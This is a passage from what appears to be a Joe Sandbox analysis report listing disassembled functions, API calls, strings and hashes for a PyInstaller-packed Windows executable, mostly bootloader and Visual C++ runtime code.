MoveWindow.USER32 ref: 00007FF72B8D22CB
MoveWindow.USER32 ref: 00007FF72B8D231E
MoveWindow.USER32 ref: 00007FF72B8D2366

Strings

P%, xrefs: 00007FF72B8D21FF

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 602ff3fddd5e8d186fd3de6dfb90e2b0f8670ae4e032fd522d98a9bbe3d12290
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 6D510726604BA186D6349F36E8181BAF7A1FBA8B61F404131EFDE43694DF3CE055CB20

Function 00007FF72B8D80C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF72B8D80FF
GetWindowLongPtrW.USER32 ref: 00007FF72B8D817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF72B8D8192
GetLastError.KERNEL32 ref: 00007FF72B8D819C
SetWindowLongPtrW.USER32 ref: 00007FF72B8D81B3

Strings

Needs to remove its temporary files., xrefs: 00007FF72B8D8185

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: dc04b61a7c7a7ff23d59ca9d9c4ffc016522fb8d9fdaf4b062650158f198bc4d
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: 5F218621B08A4381EB45AB7EEC44279A250EF98F90FD84131DE1D433F4DE2CF5A58B60

Function 00007FF8BA248BA0 Relevance: 16.7, APIs: 11, Instructions: 159COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248C6B
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248C7B
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248CC7
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248CD7
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248CE7
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248D3D
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248D6E
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248D9A
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248DAC
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248DCC
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA248DDB

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 374c7b4445af7e25337ba4d0cee41d0a88a1d907b97d00518b00ac12b1785505
Instruction ID: 509f7e08e51ce34f15e3634dcfe12f1c01c201177cc5b13fcf9636197106365e
Opcode Fuzzy Hash: 374c7b4445af7e25337ba4d0cee41d0a88a1d907b97d00518b00ac12b1785505
Instruction Fuzzy Hash: 67714872B19A469DEB11DF78D4501FC23B1AB04B8CB804875DF0D6BA89EF38D619D390

Function 00007FF8BA24A508 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A562
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A698

Strings

class , xrefs: 00007FF8BA24A6AD
union , xrefs: 00007FF8BA24A6C5
cointerface , xrefs: 00007FF8BA24A63F
enum , xrefs: 00007FF8BA24A675
struct , xrefs: 00007FF8BA24A6BC
`unknown ecsu', xrefs: 00007FF8BA24A52E
coclass , xrefs: 00007FF8BA24A651

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 2943138195-1464470183
Opcode ID: 51d946b78c79f4e17bb7b1de47df1de08bef63135b59b13d9939b22af4cdf764
Instruction ID: eb759a6346bc03b0b404eb14a681f07fa5a5e6c450f670a27b6b16aad92235f7
Opcode Fuzzy Hash: 51d946b78c79f4e17bb7b1de47df1de08bef63135b59b13d9939b22af4cdf764
Instruction Fuzzy Hash: 64515972E18A5799FB10CBAAE9805BC27B0BB14BC8F5000B5EF0D57A98DF39E555E700

Function 00007FF72B8E6290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E62D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E66C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E695C

Strings

:, xrefs: 00007FF72B8E648C
f, xrefs: 00007FF72B8E63F5
-, xrefs: 00007FF72B8E6369
p, xrefs: 00007FF72B8E6385
p, xrefs: 00007FF72B8E63FD

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 938eec027d87d3f4197fc7adad903c8d7354237c02b94e9497ed969765e767c3
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: FE12B161E1C2C386FB207A98D90427AF6A1FB40754FC84135F69D066E6DB3CE5A0CFA0

Function 00007FF72B8E0FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E1008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E13D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E166F

Strings

p, xrefs: 00007FF72B8E1112
f, xrefs: 00007FF72B8E110A
p, xrefs: 00007FF72B8E10AD
f, xrefs: 00007FF72B8E1255
f, xrefs: 00007FF72B8E10A0

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 3632eecae49ba61a60236cc58650b33a3721f93588d19e1dce4a4f436e84100f
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 0D128561E0C1C386FB28BA98E844679F691FB40754FD44135F69E46AE4DB7CE4E08FA0

Function 00007FF8BA2433E0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF8BA24357E
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24358B

Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA243839
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA243884
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8BA2438B9

Strings

csm, xrefs: 00007FF8BA243527
csm, xrefs: 00007FF8BA2434C5
csm, xrefs: 00007FF8BA2435A7

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 211107550-393685449
Opcode ID: 2d839ff92fc702e036e90624670e50b4b038d53a36dae6cd485ed0c05d9b95aa
Instruction ID: 1683b433c2b01b436ad43914bb92a2025da743d5cc71f7cd346347351c171a50
Opcode Fuzzy Hash: 2d839ff92fc702e036e90624670e50b4b038d53a36dae6cd485ed0c05d9b95aa
Instruction Fuzzy Hash: 1BE19D72A08A828AEB249F38D4803AD7BA0FB44F98F154175DF8D57796CF38E585DB00

Function 00007FF72B8D1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF72B8D11FD
malloc, xrefs: 00007FF72B8D110F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B8D11F6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B8D1098
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF72B8D1108
fseek, xrefs: 00007FF72B8D10D3
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B8D10CC

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: fe56f89ad4a933db1f19c734873d2927ede75e8c900b04aad1c4ff632a8ae62f
Instruction ID: 83cfab70b35b6218bc2e729055d27829a962ed3e010c76a4d8c08f84fa9c6d59
Opcode Fuzzy Hash: fe56f89ad4a933db1f19c734873d2927ede75e8c900b04aad1c4ff632a8ae62f
Instruction Fuzzy Hash: 21418661B1865381EE10FB6AAC016B9E391FF48BC4FC44432ED4C477A6DE3CE5658BA0

Function 00007FF72B8D8660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF72B8D3CBB), ref: 00007FF72B8D8704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF72B8D3CBB), ref: 00007FF72B8D870A
CreateDirectoryW.KERNEL32(?,00000000,00007FF72B8D3CBB), ref: 00007FF72B8D874C

Part of subcall function 00007FF72B8D8830: GetEnvironmentVariableW.KERNEL32(00007FF72B8D388E), ref: 00007FF72B8D8867
Part of subcall function 00007FF72B8D8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72B8D8889

Part of subcall function 00007FF72B8E8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E8251

Part of subcall function 00007FF72B8D2810: MessageBoxW.USER32 ref: 00007FF72B8D28EA

Strings

TMP, xrefs: 00007FF72B8D86C2
_MEI%d, xrefs: 00007FF72B8D8712
TMP, xrefs: 00007FF72B8D869C, 00007FF72B8D87A3
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF72B8D877E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF72B8D86DC

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
Instruction ID: d2345c6543765e264ab90d7685f15ac31d760d90272b99bf8276e1ecfc6ee386
Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
Instruction Fuzzy Hash: 71417311A2968344E914BB7D9C552BD9251EF89BD0FC44132EE0D477BAEE3CF5218BA0

Function 00007FF8BA24C1F8 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C3AC

Part of subcall function 00007FF8BA248F04: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA249475
Part of subcall function 00007FF8BA248F04: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA2494AA

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C35E

Strings

void, xrefs: 00007FF8BA24C242
cli::pin_ptr<, xrefs: 00007FF8BA24C375
cli::array<, xrefs: 00007FF8BA24C32B
std::nullptr_t, xrefs: 00007FF8BA24C2D7
void , xrefs: 00007FF8BA24C26A
std::nullptr_t , xrefs: 00007FF8BA24C2EA

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: ea02cf8ce8bf4896aceb1c373d4fd9d14f74077d5493258d274ba5c53a618762
Instruction ID: 1988c8b12dc42e5b58bdbadf518bdcd1bcbcc8308093fe291a4d895e0bb6de4e
Opcode Fuzzy Hash: ea02cf8ce8bf4896aceb1c373d4fd9d14f74077d5493258d274ba5c53a618762
Instruction Fuzzy Hash: 0E512A62E18B5698FB11CB68D8412BD3BB0BF08B88F4441B6DF4D12B99DF7CA554E710

Function 00007FF72B8DEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF72B8DEA65

Part of subcall function 00007FF72B8DF9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF72B8DF9FF
Part of subcall function 00007FF72B8DF9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF72B8DFA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF72B8DEB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF72B8DED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF72B8DEE98

Strings

csm, xrefs: 00007FF72B8DEB60
csm, xrefs: 00007FF72B8DEAE6
csm, xrefs: 00007FF72B8DEA7F

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: 47a65e41b8ceb493c094f77ec17b72afe32b981dc60d76e00314d4eb471feb1e
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: 76D1713390874286EB20AB79D8403ADB7A0FB45799FD00176DE8D57BA5DF38E461CB90

Function 00007FF8BA2461AA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BA246690: RtlPcToFileHeader.KERNEL32 ref: 00007FF8BA2466D4
Part of subcall function 00007FF8BA246690: RaiseException.KERNEL32 ref: 00007FF8BA24671A

RtlPcToFileHeader.KERNEL32 ref: 00007FF8BA246247
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FF8BA2462A3

Strings

Bad read pointer - no RTTI data!, xrefs: 00007FF8BA2463A8
Bad dynamic_cast!, xrefs: 00007FF8BA246312
Attempted a typeid of nullptr pointer!, xrefs: 00007FF8BA246385
Access violation - no RTTI data!, xrefs: 00007FF8BA2461AA, 00007FF8BA2463CB

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1852475696-928371585
Opcode ID: 28c61b586168f291ea3da12388abcaf5ca085dd19308925c811ceb375cbad7b4
Instruction ID: 520cf46edd85a40d6a7bcb1777a903b9fec43c9fa9c07c34b46d1f0c0a000177
Opcode Fuzzy Hash: 28c61b586168f291ea3da12388abcaf5ca085dd19308925c811ceb375cbad7b4
Instruction Fuzzy Hash: E551AF62A19A8792EE20DB58E9916B96360FF44FC8F408172DF8E47B65DF3DE505E300

Function 00007FF72B8D2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2D63
MessageBoxW.USER32 ref: 00007FF72B8D2D99

Strings

%ls: , xrefs: 00007FF72B8D2D22
[PYI-%d:ERROR] , xrefs: 00007FF72B8D2CA6
Error, xrefs: 00007FF72B8D2D8C
<FormatMessageW failed.>, xrefs: 00007FF72B8D2D70

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: d5e37351c6edec640560ad20ecdcaf8182e00e998b03055ca19e860c63bd8180
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 8831D822B08B4142E620BB29FC506ABA695FF88794FC10136EF8D93769DF3CD556CB50

Function 00007FF8BA246B5C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246BE1
GetLastError.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246BEF
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C08
LoadLibraryExW.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C1A
FreeLibrary.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C60
GetProcAddress.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C6C

Strings

api-ms-, xrefs: 00007FF8BA246C01

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
String ID: api-ms-
API String ID: 916704608-2084034818
Opcode ID: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
Instruction ID: 0771b9e065c90a80d88598f58949237012481d065dc9b33f3a9b18f847fe1681
Opcode Fuzzy Hash: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
Instruction Fuzzy Hash: 6B31DC21B1EB4292EE26AB0AE9045B53394FF48FE4F594575EF2D0A790EF3CE145A300

Function 00007FF8BA242818 Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA2428D0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA2428EE
__AdjustPointer.LIBCMT ref: 00007FF8BA24292F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24293C
__AdjustPointer.LIBCMT ref: 00007FF8BA242978
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24298D
